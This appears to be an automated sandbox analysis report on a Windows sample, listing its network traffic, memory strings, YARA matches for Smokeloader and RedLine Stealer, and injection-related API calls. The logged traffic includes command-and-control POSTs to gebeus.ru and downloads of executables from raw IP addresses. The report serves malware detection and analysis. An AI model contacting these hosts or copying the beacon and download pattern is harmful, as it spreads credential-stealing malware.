      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yakfbjcglwus.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahnkvlymtyox.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scclxbagqps.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ftpgvbtjlgwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thvbfefxpihwuvsy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: gebeus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 77.221.157.163
      Source: unknownTCP traffic detected without corresponding DNS query: 64.190.113.113
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
      Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
      Source: global trafficDNS traffic detected: DNS query: evilos.cc
      Source: global trafficDNS traffic detected: DNS query: gebeus.ru
      Source: global trafficDNS traffic detected: DNS query: mussangroup.com
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 8931
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ea Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:15:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:16:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:17:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 23 Jul 2024 04:18:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000002.00000000.2100573237.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2108451661.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000002.00000000.2106911547.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107728483.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107759847.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000002.00000000.2112085690.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2112085690.000000000C861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: C9F5.exe, C9F5.exe.2.drString found in binary or memory: http://www.oberhumer.com
      Source: explorer.exe, 00000002.00000000.2111355914.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000002.00000000.2105745637.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000002.00000000.2102045759.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000002.00000000.2111355914.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
      Source: explorer.exe, 00000002.00000000.2108451661.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara matchFile source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401538
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,0_2_00402FE9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401496
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401543
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401565
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401579
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040157C
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401538
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,4_2_00402FE9
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DE
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401496
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401543
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401565
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401579
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040157C
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A6900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation,7_2_00007FF7D50A6900
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C5260 NtAllocateVirtualMemory,7_2_00007FF7D50C5260
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C5100 NtWriteVirtualMemory,7_2_00007FF7D50C5100
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C3F30 NtQueryInformationProcess,7_2_00007FF7D50C3F30
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C59D0 NtProtectVirtualMemory,7_2_00007FF7D50C59D0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C4FC0 NtReadVirtualMemory,7_2_00007FF7D50C4FC0
      Source: C9F5.exe.2.drStatic PE information: No import functions for PE file found
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: ajjwvsd.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@11/4@9/9
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50DF5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,7_2_00007FF7D50DF5B0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00849A8F CreateToolhelp32Snapshot,Module32First,0_2_00849A8F
